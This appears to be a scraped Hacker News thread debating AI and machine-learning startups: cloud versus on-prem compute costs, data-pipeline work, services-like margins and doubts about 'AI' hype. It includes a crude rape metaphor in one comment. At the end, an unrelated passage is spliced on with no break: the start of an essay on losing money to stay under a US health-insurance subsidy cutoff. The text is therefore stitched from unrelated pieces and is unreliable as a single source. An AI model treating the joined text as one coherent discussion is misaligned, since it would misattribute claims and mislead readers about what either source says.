I ran a ML based 3D reconstruction service for 7 years - given face photos of a person, reconstruct a realistic 3D likeness. I licensed a finished 3D reconstruction algorithm, purchased $50K worth of servers plus a federal reserve bank quality hardware firewall, and put it all in a Los Angeles downtown co-lo (the former Enron data center, actually.) I paid $600 a month to run that, as opposed to the equal compute capability being $96K per month if run at Amazon.

It kills me to see people being raped by the cloud, but everyone just lines up like good little boys...

andrew311(4248) about 15 hours ago [-]

What colo company did you use?

dmak(4019) about 16 hours ago [-]

How did you estimate your hardware needs?

eyegor(3683) about 16 hours ago [-]

Yes, it's quite obvious when you actually have compute needs. At my current employer, we spent about 100k to build a small single-purpose HPC cluster. One year later, I calculated that the equivalent Azure costs (to help bargain for more servers) would have been around 1.5M. This is almost 24/7 use though, and add another ~150k in electricity.

burnte(4294) about 16 hours ago [-]

I did similar at my current and last job. Rather than spend $24k/month, I spent $50k, bought a shitton of hardware, built a virtualization cluster at corp, and upgraded our connections. Accounting thought I was a wizard.

marcus_holmes(4163) about 9 hours ago [-]

The point of the cloud is that it solves the problem of variable demand.

I used to run on-prem back in the 2000s, and we were constantly dealing with demand-fluctuation crises. Spinning up new physical servers to deal with new demand, or being massively over-specced when demand dropped, was a real pain.

I'm starting a new thing this week, and using the Cloud for it because I have no idea what our demand will be. I can start small, scale up with our customer growth, and never have to worry about ordering new servers a month in advance so I have enough capacity when (or if) I need it.

At some point in the future, when our needs are clear and relatively stable, it might make sense to migrate to on-prem and save those costs.

seibelj(2509) about 20 hours ago [-]

I wrote an article I published a week ago about how AI is the biggest misnomer in tech history https://medium.com/@seibelj/the-artificial-intelligence-scam...

I wrote it to be tongue-in-cheek in a ranting style, but essentially 'AI' businesses and the technology underpinning them are not the silver bullet the media and marketing hype has made them out to be. The linked article about a16z shows how AI is the same story everywhere - enormous capital to get the data and engineers to automate, but even the 'good' AI still gets it wrong much of the time, necessitating endless edge cases and human intervention, and eventually it's a giant ball of poorly-understood and impossible-to-maintain pipelines that don't even provide a better result than a few humans with a spreadsheet.

scottlocklin(2490) about 15 hours ago [-]

Coming from a fellow masshole: that's a great rant.

There was this meme in the 70s about 'self-driving cars' following magnetic strips in the road on restricted highways. I remember at the time, being, like, 8 and thinking 'sure seems like an overly complicated train.'

ativzzz(10000) about 19 hours ago [-]

I agree with the author's opinion about

> I'll go out on a limb and assert that most of the up front data pipelining and organizational changes which allow for it are probably more valuable than the actual machine learning piece.

Especially at non-tech companies with outdated internal technology. I've consulted at one of these and the biggest wins from the project (I left before the whole thing finished unfortunately) were overall improvements to the internal data pipeline, such as standardization and consolidation of similar or identical data from different business units.

noelsusman(10000) about 19 hours ago [-]

I do data science at a non-tech company with outdated internal technology and I've seen this over and over again. Honestly though, it's worth every penny because often the only way to get the resources to truly solve data pipeline issues is to get an executive to buy some crap from a vendor and force everyone to make it work.

jotakami(10000) about 15 hours ago [-]

I was a consultant at one of the giant outsourcers and I'm nodding my head vigorously at this comment. The least sexy projects were MDM (master data management), but they were absolutely essential to the success of any other fancy analytics/BI/ML project.

fxtentacle(4197) about 18 hours ago [-]

I predict a great future for startups that sell pickaxes, err, tools for AI.

AI is like the new gold rush. And just like back then, it's not the gold diggers that will get rich.

'Most people in AI forget that the hardest part of building a new AI solution or product is not the AI or algorithms — it's the data collection and labeling.'

https://medium.com/startup-grind/fueling-the-ai-gold-rush-7a...

(from 2017)

moksly(10000) about 18 hours ago [-]

Is it the new gold rush, though? I work in a large organisation that has a lot of data and inefficient processes, and we haven't bought anything.

It hasn't been for lack of trying. We've had everyone from IBM and Microsoft to small local AI startups try to sell us their magic, but no one has come up with anything meaningful to do with our data that our analysis department isn't already doing without ML/AI. I guess we could replace some of our analysis department with ML/AI, but working with data is only part of what they do; explaining the data and helping our leadership make sound decisions is their primary function, and it's kind of hard for ML/AI to do that (trust me).

What we have learned, though, is that even though we have a truckload of data, we can't actually use it unless we have someone on deck who actually understands it. IBM had a run at it, and they couldn't get their algorithms to understand anything, not even when we tried to help them. I mean, they did come up with some basic models that their machine spotted/learned by itself by trawling through our data, but nothing we didn't already have. Because even though we have a lot of data, the quality of it is absolute shite. This is anecdotal, but it's terrible because it was generated by thousands of human employees over 40 years, and even though I'm guessing, I doubt we're unique in that respect.

We'll continue to do various proof of concepts and listen to what suppliers have to say, but I fully expect most of it to go the way Blockchain did which is where we never actually find a use for it.

With a gold rush, you kind of need the nuggets of gold to sell, and I'm just not seeing that with ML/AI. At least not yet.

hooande(3824) about 18 hours ago [-]

AI != gold. The market for selling tools to people who are essentially chasing buzz words is much smaller than that of selling tools to people extracting scarce metals from the ground.

Ultimately the value of selling tools is dependent on the riches being mined actually existing. The value of AI/big data to the average business has yet to be determined

b0b10101(4028) about 18 hours ago [-]

>'Most people in AI forget that the hardest part of building a new AI solution or product is not the AI or algorithms — it's the data collection and labeling.'

A lot of those companies are styled as 'AI' companies themselves, aiming to automate the process of labeling.

The main winner here really is Amazon. They get a chunk by serving up infrastructure and in labeling through mechanical turk.

m0zg(10000) about 20 hours ago [-]

'Huge compute bills' usually come from training, or to be more precise, hyperparameter search that's required before you find a model that works well. You could also fail to find such a model, but that's another discussion.

So yeah, you could spend one or two FTE salaries' (or one deep learning PhD's) worth of cash on finding such models for your startup if you insist on helping Jeff Bezos to wipe his tears with crisp hundred dollar bills. That's if you know what you're doing of course. Literally unlimited amounts could be spent if you don't. Or you could do the same for a fraction of the cost by stuffing a rack in your office with consumer grade 2080ti's. Just don't call it a 'datacenter' or NVIDIA will have a stroke. Is that too much money? Not in most typical cases, I'd think. If the competitive advantage of what you're doing with DL does not offset the cost of 2 meatspace FTEs, you're doing it wrong.

That, once again, assumes that you know what you're doing, and aren't doing deep learning for the sake of deep learning.

Also, if your startup is venture funded, AWS will give you $100K in credit, hoping that you waste it by misconfiguring your instances and not paying attention to their extremely opaque billing (which is what most of their startup customers proceed to do pretty much straight away). If you do not make these mistakes, that $100K will last for some time, after which you could build out the aforementioned rack full of 2080ti's on prem.

zitterbewegung(357) about 18 hours ago [-]

I was training ML models on AWS / Google Colab. After racking up a few hundred dollars on AWS, I bought a Titan RTX (I also play video games, so it does that very well too).

artsyca(4100) about 18 hours ago [-]

Slow clap

bob1029(10000) about 19 hours ago [-]

I find it fun how the cost of the cloud is forcing people to consider what absolutely must run in the cloud (presumably for stability and compliance reasons) and what can be brought back on-prem.

We don't train ML models, but we are in a similar boat regarding cloud compute costs. Building our solutions for our clients is a compute-heavy task which is getting expensive in the cloud. We are considering options such as building commodity threadripper rigs, throwing them in various developers' (home) offices, installing a VPN client on each and then attaching as build agents to our AWS-hosted jenkins instance. In this configuration we could drop down to a t3a.micro for Jenkins and still see much faster builds. The reduction in iteration time over a month would easily pay for the new hardware. An obvious next step up from this is to do proper colocation, but I am of a mindset that if I have to start racking servers I am bringing 100% of our infrastructure out of the cloud.

calebkaiser(4056) about 17 hours ago [-]

Inference is also becoming a bigger contributor to compute bills, especially as models get bigger. With big models like GPT-2, it's not unheard of for teams to scale up to hundreds of GPU instances to handle a surprisingly small number of concurrent users. Things can get expensive pretty quickly.

pridkett(10000) about 19 hours ago [-]

There's also the issue that data scientists often want to go running to hyperparameter optimization and neural architecture search. In most cases improving your data pipelines and ensuring the data are clean and efficient will pay off much more quickly.

liuliu(3400) about 17 hours ago [-]

I've been playing with custom-built 2080 Ti workstation for a while: https://www.youtube.com/watch?v=OF3JYEIsjH8

Several issues: 1. The electricity bill is still an issue; I've been paying anywhere between $500 and $1,000 per month for this workstation (there's always something to train). 2. Anything with a decent memory size (Titan RTX and RTX 8000) costs way too much. 3. Once you reach the point where four 2080 Tis aren't fast enough, power management and connectivity setup become a nightmare.

Would love to know other people's opinions on on-prem setups, especially whether consumer-grade 10GbE is enough connectivity-wise.

paulddraper(4100) about 18 hours ago [-]

> Also, if your startup is venture funded, AWS will give you $100K in credit

AFAIK that is limited to <$20k and it expires.

fxtentacle(4197) about 19 hours ago [-]

No, inference is also quite expensive. You'll have 100% usage on a $10,000 GPU for 3s per customer image for a decently sized optical flow network. That's 3 hours of compute time for 1 minute of 60fps video.

Now let's say your customer wants to analyze 2 hours = 120 minutes of video and doesn't want to wait more than those 3 hours, then suddenly you need 120 servers with one $10k GPU each to service this one customer within 3 hours of waiting.

Good luck reaching that $1,200,000 customer lifetime value to get a positive ROI on your hardware investment.
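A few lines capture that arithmetic (same assumed numbers as above: $10k GPUs, 3s of inference per frame, 60fps, a 3-hour wait budget):

  gpu_cost = 10_000          # $ per GPU
  secs_per_frame = 3         # inference time per frame
  fps = 60
  video_minutes = 120        # the customer's video
  max_wait_hours = 3

  compute_secs = video_minutes * 60 * fps * secs_per_frame  # 1,296,000 s
  wall_clock_secs = max_wait_hours * 3600                   # 10,800 s
  gpus_needed = compute_secs / wall_clock_secs              # 120 GPUs
  print(gpus_needed, gpus_needed * gpu_cost)                # 120 GPUs, $1.2M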

When I talk about AI, I usually call it 'beating the problem to death with cheap computing power'. And looking at the average cleverness of AI algorithm training formulas, that seems to be exactly what everyone else is doing, too.

And since I'm being snarky anyway, there are two subdivisions to AI:

supervised learning => remember this

unsupervised learning => approximate this

Neither approach puts much emphasis on intelligence ;) And both can usually be implemented more efficiently without AI, if you know what you are doing.

ignoramous(2353) about 19 hours ago [-]

As someone hoping to build a world-wide footprint of servers to deploy to, say 25 to 50 DCs with unmetered bandwidth, what are some alternatives to the usual suspects?

I have come across fly.io, Vultr, Scaleway, StackPath, Hetzner, and OVH, but either they are expensive (in that they charge for bandwidth and uptime) or they don't have a wide enough footprint.

I guess colos are the way to go, but how does one work with colos, allocate servers, deploy to them, and ensure security and uptime and so on from a single place? Dealing with them individually might slow down the process. Is there tooling that deals with multiple colos, like the multi-cloud tooling such as min.io, k8s, Triton, etc.?

avip(4182) about 20 hours ago [-]

For balance, all the big cloud providers - AWS, GCP, Azure, Oracle [0] - have pretty similar startup plans. Y$$MV

(I'm in full agreement with everything you've written + it's well-phrased and funny. gj!)

[0] that's not a typo - there is such thing as 'Oracle cloud'

alephnan(4298) about 19 hours ago [-]

> Just don't call it a 'datacenter' or NVIDIA will have a stroke.

Context please :) ?

walshemj(4216) about 17 hours ago [-]

Yep, if you're getting huge bills you should be doing on-prem HPC, e.g. where a 15k budget means 15kW per container and you're into exotic network designs where 10G won't cut it any more.

E.g., from 2011, 6400 Hadoop nodes: http://bradhedlund.com/2011/11/05/hadoop-network-design-chal...

God only knows what fun you could get up to with modern tech - I miss bleeding-edge R&D

fizixer(10000) about 19 hours ago [-]

- Or AMD could change their policy of 'never miss an opportunity to miss an opportunity' and offer high-performance OpenCL GPGPU offerings. Then nVidia could have all the stroke they wanted.

- Or TensorFlow/PyTorch could've crapped on OpenCL a little less by releasing a fully functional OpenCL version every time they released a fully functional CUDA version, instead of worshipping CUDA year in and year out.

- Or Google could start selling their TPUv2, if not TPUv3, while they're on the verge of releasing TPUv4.

- Or one of the other big-tech's Facebook/Microsoft/Intel could make and start selling a TPU-equivalent device.

- Or I could finish school and get funded to do all/most of the above ;)

edit: On a more serious note, a cloud/on-prem hybrid is absolutely the right way to go. You should have a 4x 2080 Ti rig available 24x7 for every ML engineer. It costs about $6k-8k apiece [0]. Prototype the hell out of your models on on-prem hardware. Then, when your setup is in working condition and starts producing good results on small problems, you're ready to do a big computation for final model training, which you send to the cloud for the final production run. (Guess what: on a majority of your projects, you might realize the final production run could be carried out on-prem as well; you just have to keep it running 24 hours a day for a few days or up to a couple of weeks.)

[0]: https://l7.curtisnorthcutt.com/the-best-4-gpu-deep-learning-...

correlator(4315) about 20 hours ago [-]

No need to look at AZ for this. If you're building 'AI', I wish you a speedy road to being acquired by a company that can put it to use. You've become a high-priced recruiting firm.

If you're solving a real problem and use ML in service of solving that problem, then you've got a great moat: happy, trusting customers.

It's not complicated

motohagiography(4284) about 18 hours ago [-]

Sssh! Valuations are a function of projected market size and opacity of the problem. Clarity like this collapses the uncertainty and destroys value. If you pour enough capital into rooms full of PhDs, something's gotta hit.

My way of saying, you're very, very right.

inthewoods(4080) about 16 hours ago [-]

Having briefly worked for an AI company, I agree with the conclusion that AI companies are more like services businesses than software companies. I would add only one other thing: going forward there likely won't be 'AI companies' - AI exists to power applications. And in my experience, unless the output is truly differentiated, customers aren't willing to spend more for something 'powered by AI' - they just expect that software has evolved to provide the kind of insights that AI sometimes delivers.

shoo(4257) about 15 hours ago [-]

For an example of a genuine software company vaguely in this ecosystem, consider companies that build the tools that some AI/ML/optimisation systems use as building blocks. Eg optimisation algorithms.

If you need to solve gnarly industrial-scale mixed-integer combinatorial optimisation problems in the guts of your ML / optimisation engine, the commercial MIP solvers (Gurobi, CPLEX) or non-MIP-based combinatorial optimisation systems (LocalSolver) can often give better results in exponentially less running time than free open-source alternatives.
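For readers who haven't touched MIP, here's a toy model in the open-source PuLP library to show the shape of the formulation; the commercial solvers mentioned above accept essentially the same kind of model, just at vastly larger scale. All numbers are made up.

  from pulp import LpProblem, LpVariable, LpMaximize, lpSum

  # Toy knapsack: pick projects to maximize profit under a budget.
  profits = [12, 9, 7, 15]
  costs = [4, 3, 2, 6]
  budget = 10

  prob = LpProblem('project_selection', LpMaximize)
  x = [LpVariable(f'x{i}', cat='Binary') for i in range(len(profits))]
  prob += lpSum(p * xi for p, xi in zip(profits, x))          # objective
  prob += lpSum(c * xi for c, xi in zip(costs, x)) <= budget  # constraint
  prob.solve()
  print([xi.value() for xi in x])

Real industrial instances have millions of variables and constraints, which is where the clever tricks baked into the commercial solvers earn their license fees.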

1% more optimal solutions might translate into 1% more net profit for the entire org if you've gone whole hog and are trying to systematically profit-optimise the entire business, so depending on the scale of the org it might be an easy business case to invest a few million dollars to put this system in place.

Annual server licenses for this commercial MIP solver software were O($100k)/yr per server, and the companies that build these products bake a lot of clever tricks from academia into them, which you can exploit by paying the license fee. (My knowledge of pricing is about 7 years out of date.)

mapgrep(4261) about 15 hours ago [-]

Aren't software businesses increasingly like service businesses though?

They now often ship with backend cloud storage, update near-continuously, integrate frequently with outside services, sometimes open-source major components iteratively, typically have an evolving API and developer ecosystem to educate, and are sold as subscriptions. It's not as "human in the loop" as some of the AI described in this article, but it's clearly moving toward services in terms of margins.

Nothing is like the old shrink wrapped software business, basically.

lazzlazzlazz(10000) about 20 hours ago [-]

Is the misspelling of 'Andreessen-Horowitz' and use of 'A19H' instead of 'a16z' intentional?

scottlocklin(2490) about 19 hours ago [-]

I suck at spelling. If I was one of the cool kids I'd claim to be dyslexic.

khazhoux(10000) about 20 hours ago [-]

You mean the fact that they left out an 's' in Andreessen?

allovernow(4302) about 19 hours ago [-]

All of this might be true currently, but that's because this current first generation of 'AI' (which technically should just be called ML) is mostly bullshit. To clarify, I don't mean anyone is lying or selling snake oil - what I mean by bullshit is that the vast majority of these services are cooked up by software developers without any background in mathematics, selling adtechy services in domains like product recommendation and sentiment analysis. They are single-discipline applications accessible to devs without science backgrounds and do not rely on substantial expertise from other fields. That makes them narrow in technical scope and easy to rip off (hence no moat, lots of competition, reliance on humans, and a lack of actual software).

The next generation of Machine Learning is just emerging, and looks nothing like this. Funds are being raised, patents are being filed, and everything is in early stage development, so you probably haven't heard much yet - but these ML startups are going after real problems in industry: cross-disciplinary applications leveraging the power of heuristic learning to make designs and decisions currently still limited to the human domain.

I'm talking about the kind of heuristics which currently exist only as human intuition expressed most compactly as concept graphs and, especially, mathematical relationships - e.g. component design with stress and materials constraints, geologic model building, treatment recommendation from a corpus of patient data, etc. ML solutions for problems like these cannot be developed without an intimate understanding of the problem domain. This is a generalist's game. I predict that the most successful ML engineers of the next decade will be those with hard STEM backgrounds, MS and PhD level, who have transitioned to ML. [Un]Fortunately for us, the current buzzwordy types of ML services give the rest of us a bad name, but looking at these upcoming applications the answers to the article tl;dr look different:

>Deep learning costs a lot in compute, for marginal payoffs

The payoffs here are far greater. Designs are in the pipeline which augment industry roles - accelerating design by replacing finite-element methods with vastly quicker ML for unprecedented iteration; producing meaningful suggestions during the development of 3D designs; fetching related technical documents in real time by scanning the progressive design as the engineer works, parsing it and probabilistically suggesting alternative paths for research progression. Think Bonzi Buddy on steroids... this is a place for recurring software licenses, not SaaS.

>Machine learning startups generally have no moat or meaningful special sauce

For solving specific, technical problems, neural network design requires a certain degree of intuition with respect to the flow of information through the network, which both optimizes and limits the kinds of patterns that a given net can learn. Thus designing NNs for hard-industry applications is predicated upon an intimate understanding of domain knowledge, and these highly specialized neural nets become patentable secret sauces. That's half of the moat - the other half comes from competition for the software developers with first-hand experience in these fields, or a general enough math-heavy background to capture the relationships that are being distilled into nets.

>Machine learning startups are mostly services businesses, not software businesses

Again only true because most current applications are NLP adtechy bullshit. Imagine coding in an IDE powered by an AI (multiple interacting neural nets) which guides the structure of your code at a high level and flags bugs as you write. This, at a more practical level, is the type of software that will eventually change every technical discipline, and you can sell licenses!

>Machine learning will be most productive inside large organizations that have data and process inefficiencies

This next generation goes far past simply optimizing production lines or counting missed pennies or extracting a couple extra percent of value from analytics data. This style of applied ML operates at a deeper level of design which will change everything.

scottlocklin(2490) about 19 hours ago [-]

>The next generation of Machine Learning is just emerging, and looks nothing like this. Funds are being raised, patents are being filed, and everything is in early stage development, so you probably haven't heard much yet ...

Citations needed. Large claims: presumably you can name one example of this, and hopefully it's not a company you work at.

I've seen projects on literally all the things you mention: materials science, medical stuff, geology/prospecting - none of them worked well enough to build a standalone business around. I do know the oil companies are using DL ideas with some small successes, but this only makes sense for them, as they've been working on inverse problems for decades. None of them buy canned software/services: it's all done in-house. Probably always will be, same as their other imaging efforts.

rossdavidh(4220) about 19 hours ago [-]

So, way back in the last millennium, I did my Master's thesis (a way smaller deal than a Ph.D. thesis) on neural networks. Since then, I have looked in on the field every few years. I think they're cool, I like using them, and writing multi-level backpropagation neural networks used to be one of the first things I'd do in a new language, just to get a feel for how it worked (until PyTorch came along and I decided for the first time that using a library was easier than writing my own).

So it's not like I dislike ML. But saying an investment is an 'AI' startup ought to be like saying it's a Python startup, or a Postgres startup. That ought not to be something you tell people as a defining characteristic of what you do, not because it's a secret but because it's not that important to your odds of success. If you used a different language and database, you would probably have about the same odds of success, because success depends more on how well you understand the problem space and how well you architect your software.

Linear models or other more traditional statistical models can often perform just as well as DL or any other neural network, for the same reason that when you look at a Kaggle leaderboard, the difference between the leaders is usually not that big after a while. The limiting factor is the data, and how well you have transformed/categorized that data; all the different ML methods that get thrown at it end up with similar-looking levels of accuracy.
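A cheap way to sanity-check that on your own problem is to run a linear baseline next to a small neural net before reaching for anything deeper (a sketch with scikit-learn; the bundled dataset and hyperparameters are placeholders):

  from sklearn.datasets import load_breast_cancer
  from sklearn.linear_model import LogisticRegression
  from sklearn.model_selection import cross_val_score
  from sklearn.neural_network import MLPClassifier

  X, y = load_breast_cancer(return_X_y=True)

  linear = LogisticRegression(max_iter=5000)
  net = MLPClassifier(hidden_layer_sizes=(64, 64), max_iter=2000)

  # If these scores are close, the extra complexity isn't buying much.
  print('linear:', cross_val_score(linear, X, y, cv=5).mean())
  print('net:   ', cross_val_score(net, X, y, cv=5).mean())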

There used to be a saying: 'If you don't know how to do it, you don't know how to do it with a computer.' AI boosters sometimes sound as if they are suggesting that this is no longer true. They're incorrect. ML is, absolutely, a technique that a good programmer should know about, and may sometimes wish to use, kind of like knowing how a state machine works. It doesn't make a great deal of difference to how likely a business is to succeed.

7532yahoogmail(10000) about 18 hours ago [-]

Thank you for the perspective. Now, when we talk about machine learning, are we talking:

L. Pachter and B. Sturmfels. Algebraic Statistics for Computational Biology. Cambridge University Press, 2005.

G. Pistone, E. Riccomagno, and H. P. Wynn. Algebraic Statistics. CRC Press, 2001.

M. Drton, B. Sturmfels, and S. Sullivant. Lectures on Algebraic Statistics. Springer, 2009.

Or more like:

Watanabe, Sumio. Algebraic Geometry and Statistical Learning Theory, Cambridge University Press 2009.

My understanding (I do not do AI or machine learning) is that AI is distinct from these more mathematical, analytic perspectives.

Finally, might we argue that AI/ML is generally better suited to data that's already high quality, e.g. CERN data, trade data, drug trial data, as opposed to unconstrained data, e.g. 'find the buses in these 1MM JPEGs'?

phreeza(707) about 16 hours ago [-]

> There used to be a saying: 'If you don't know how to do it, you don't know how to do it with a computer.'

This is a tautology in the narrow sense, but in the broader sense I think there surely exist things that humans don't 'know' how to do without a computer, but know how to do with a computer. And the space of solveable problems is expanding, though AI is only a narrow slice of that.

justinmeiners(4320) about 16 hours ago [-]

> If you don't know how to do it, you don't know how to do it with a computer.

This is so true. We spent decades educating non-technical people that understanding a problem well is a prerequisite to programming it. Take something easy to understand, like driving a car: doing it with a computer is much harder.

AI is undoing all that. People reach a vague problem they can't describe and assume computers will magically fix it.

Tostino(2992) about 18 hours ago [-]

Well, the term 'Postgres startup' or 'Python startup' may not make sense, and a 'PyTorch startup' or 'TensorFlow startup' may not either. A 'database startup', though, tells me the company is likely going to be in the database field, and most likely is going to try to sell me something I don't need. An 'AI startup', similarly, is going to either be utilizing existing techniques on industry problems to sell me something I don't need, or making some novel improvement to training or inference to sell me something else I don't need.

So...yeah.

jedberg(2119) about 18 hours ago [-]

Saying that you're going to 'use AI' is more akin to saying 'we're going to have a web application' back in 1998.

Back then a lot of startups didn't have websites, because they were making other products (hardware, boxed software, etc). If they had a website it was just a marketing page.

So saying that you were going to make a 'web application' did in fact differentiate you, in that it showed your approach was very different from the boxed software folks, but it didn't tell you much beyond that.

aj7(4016) about 18 hours ago [-]

" Embrace services. There are huge opportunities to meet the market where it stands. That may mean offering a full-stack translation service rather than translation software or running a taxi service rather than selling self-driving cars. Building hybrid businesses is harder than pure software, but this approach can provide deep insight into customer needs and yield fast-growing, market-defining companies. Services can also be a great tool to kickstart a company's go-to-market engine – see this post for more on this – especially when selling complex and/or brand new technology. The key is pursue one strategy in a committed way, rather than supporting both software and services customers."

Exactly wrong, and it contradicts most of the thesis of the article - that AI often fails to achieve acceptable models because of the individuality, finickiness, edge cases, and human involvement needed to process customer data sets.

The key to profitability is for AI to be a component in a proprietary software package, where the VENDOR studies, determines, and limits the data sets and PRESCRIBES this to the customer, choosing applications many customers agree upon. Edge cases and cat-guacamole situations are detected and ejected, and the AI forms a smaller, but critical efficiency enhancing component of a larger system.

TheOtherHobbes(4310) about 17 hours ago [-]

The thesis of the article is that this is going to be called consultancy.

Single-focus disruptors bad. Generic consultancy good - with ML secret sauce, possibly helped by hired specialist human insight.

Companies that can make this work will kill it. Companies that can't will be killed.

It's going to be IBM, Oracle, SAP, etc all over again. Within 10 years there will be a dominant monopolistic player in the ML space. It will be selling corporate ML-as-a-service, doing all of that hard data wrangling and model building etc and setting it up for clients as a packaged service using its own economies of scale and 'top sales talent' (it says here).

That's where the big big big big money will be. Not in individual specialist 'We ML'd your pizza order/pet food/music choices/bicycle route to work' startups.

Amazon, Google, MS, and maybe the twitching remnants of IBM will be fighting it out in this space. But it's possible they'll get their lunch money stolen by a hungry startup, perhaps in collaboration with someone like McKinsey, or an investment bank, or a quant house with ambitions.

5-10 years after that customisable industrial-grade ML will start trickling down to the personal level. But it will probably have been superseded by primitive AGI by then, which makes prediction difficult - especially about that future.

shoo(4257) about 16 hours ago [-]

> most people haven't figured out that ML oriented processes almost never scale like a simpler application would. You will be confronted with the same problem as using SAP; there is a ton of work done up front; all of it custom. I'll go out on a limb and assert that most of the up front data pipelining and organizational changes which allow for [ML to be used operationally by an org] are probably more valuable than the actual machine learning piece.

Strong agreement from me: I've never worked on deploying ML models, but have worked on deploying operations-research type automated decision systems that have somewhat similar data requirements. Most of the work is client org specific in terms of setting up the human & machine processes to define a data pipeline to provide input and consume output of the clever little black box. A lot of this is super idiosyncratic & non repeatable between different client deployments.

izendejas(4257) about 15 hours ago [-]

That's because ML and operations-research problems can be reduced to sets of optimization problems, and the underlying math and statistics are all very similar, if not identical in some cases.

And the input matters, a lot. So the differentiating factor isn't the models, it's the data and companies like Google figured it out a long time ago.

In short, find interesting problems, then the solutions -- not the other way around.

amai(3380) about 2 hours ago [-]

'(my personal bete-noir; the term "AI" when they mean "machine learning")'

This is so right. Using the term 'artificial intelligence' for machine learning is like using 'artificial horses' to describe cars. It's even worse, since we cannot even define what 'natural intelligence' actually is. Stop talking about 'artificial intelligence'.

DonHopkins(3269) about 1 hour ago [-]

Or 'artificial swans' that 'appear even more lifelike'.

https://www.louwmanmuseum.nl/ontdekken/ontdek-de-collectie/b...

>The bodywork represents a swan gliding through water. The rear is decorated with a lotus flower design finished in gold leaf, an ancient symbol for divine wisdom. Apart from the normal lights, there are electric bulbs in the swan's eyes that glow eerily in the dark. The car has an exhaust-driven, eight-tone Gabriel horn that can be operated by means of a keyboard at the back of the car. A ship's telegraph was used to issue commands to the driver. Brushes were fitted to sweep off the elephant dung collected by the tyres. The swan's beak is linked to the engine's cooling system and opens wide to allow the driver to spray steam to clear a passage in the streets. Whitewash could be dumped onto the road through a valve at the back of the car to make the swan appear even more lifelike.

>The car caused panic and chaos in the streets on its first outing and the police had to intervene.

harias(3449) about 20 hours ago [-]

>That's right; that's why a lone wolf like me, or a small team can do as good or better a job than some firm with 100x the head count and 100m in VC backing.

goes on to say

>I agree, but the hockey stick required for VC backing, and the army of Ph.D.s required to make it work doesn't really mix well with those limited domains, which have a limited market.

Choose one?

It also assumes running your own data center is easy. Some people don't want to be up 24x7 monitoring their data center, or to buy hardware to accommodate the rare 10-minute peaks in usage.

sp527(4153) about 13 hours ago [-]

Training ML models usually doesn't have the same uptime requirements as production systems. If your training goes down for a bit, it probably won't make much difference to the underlying business, in most cases.

That's why the author found it glaringly obvious that it should be brought in-house. It's often both the most costly and most "in-housable" compute work involved in these companies.

detaro(2041) about 18 hours ago [-]

> Some people don't want to be up 24x7 monitoring their data center or to buy hardware to accommodate the rare 10 minute peaks in usage.

Do you need that for training workloads, and what percentage of a startups workload is training?

jjeaff(4208) about 19 hours ago [-]

>rare 10 minute peaks

But is that really the use case here? I haven't worked in ML. But I'm not seeing where you are going to need to handle a 10 minute spike that requires a whole datacenter.

A month's worth of a quad gpu instance on AWS could pay for a server with similar capacity in a few months of usage.

And hardware is pretty resilient these days. Especially if you co-locate it in a datacenter that handles all the internet and power up time for you. And when something does go wrong, they offer 'magic hands' service to go swap out hardware for you. Colocation is surprisingly cheap. As is leasing 'managed' equipment.

bsenftner(4284) about 15 hours ago [-]

I ran a small data cluster for years; it was the horsepower behind my startup. Other than the Chinese DDoS attacks, running the cluster was absolutely elementary. The idea that running a server or a band of servers is difficult is a bald-faced lie. People have got to stop repeating the cloud propaganda.

icheishvili(10000) about 19 hours ago [-]

I don't think these are necessarily contradictory. With pytorch-transformers, you can use a full-blown BERT model like the best in the world. And yet, to make something novel and defensible, you would need to build on top of it and innovate significantly, which would require significant capital.
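For context, 'using a full-blown BERT model' really is a few lines these days, which is exactly why doing so confers no moat on its own (a sketch using the Hugging Face transformers library, the successor to pytorch-transformers):

  from transformers import AutoModel, AutoTokenizer

  tokenizer = AutoTokenizer.from_pretrained('bert-base-uncased')
  model = AutoModel.from_pretrained('bert-base-uncased')

  # Embed a sentence; near state-of-the-art features, off the shelf.
  inputs = tokenizer('machine learning startups', return_tensors='pt')
  outputs = model(**inputs)
  print(outputs.last_hidden_state.shape)  # (1, num_tokens, 768)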

brundolf(1517) about 19 hours ago [-]

> Training a single AI model can cost hundreds of thousands of dollars (or more) in compute resources

Why don't they buy their own hardware for this part? The training process doesn't need to be auto-scalable or failure-resistant or distributed across the world. The value proposition of cloud hosting doesn't seem to make sense here. Surely at this price the answer isn't just 'it's more convenient'?

KaiserPro(10000) about 19 hours ago [-]

because you are trading speed for cash.

Say you have $8M in funding, and you need to train a model to do x

You can either:

a) gain access to a system that scales on demand and gives instant, actionable results.

b) hire an infrastructure person, plus someone to write a K8s deployment system, another person to come in and throw that all away, another person to negotiate and buy the hardware, and another to install it.

Option b can be the cheapest in the long term, but it carries the most risk of failing before you've even trained a single model. It also costs time, and if speed to market is your thing, then you're shit out of luck.

GaryNumanVevo(10000) about 19 hours ago [-]

If you're in a position where you need to train a large network: first, I feel bad for you. Second, you'll need additional machines to train in a reasonable amount of time.

ML distributed training is all about increasing training velocity and searching for good hyperparameters

etrk(10000) about 9 hours ago [-]

I interviewed at some AI companies a year or two back. They all had teams of people dedicated to support each client: to clean their data, train their models, integrate the domain-specific requirements, customize UIs, etc. They sold themselves as the next AI-powered mega-unicorns, but they were more like boutique consultancies with no obvious path to scale up.

auxten(4111) about 9 hours ago [-]

'Boutique consultancy' sums up most AI companies for now, but it may be the only way to empower their clients. One of these startups will find the path to scaling up eventually.





Historical Discussions: Suspicious Discontinuities (February 20, 2020: 635 points)

(637) Suspicious Discontinuities

637 points 5 days ago by janvdberg in 164th position

danluu.com | Estimated reading time – 19 minutes | comments | anchor

Suspicious discontinuities

If you read any personal finance forums late last year, there's a decent chance you ran across a question from someone who was desperately trying to lose money before the end of the year. There are a number of ways someone could do this; one commonly suggested scheme was to buy put options that were expected to expire worthless, allowing the buyer to (probably) take a loss.

One reason people were looking for ways to lose money was that, in the U.S., there's a hard income cutoff for a health insurance subsidy at $48,560 for individuals (higher for larger households; $100,400 for a family of four). There are a number of factors that can cause the details to vary (age, location, household size, type of plan), but across all circumstances, it wouldn't have been uncommon for an individual going from one side of the cutoff to the other to have their health insurance cost increase by roughly $7200/yr. That means an individual buying ACA insurance who was going to earn $55k would be better off reducing their income by $6440 to get under the $48,560 subsidy ceiling than earning the full $55k, since the roughly $7200/yr subsidy more than offsets the forgone income.

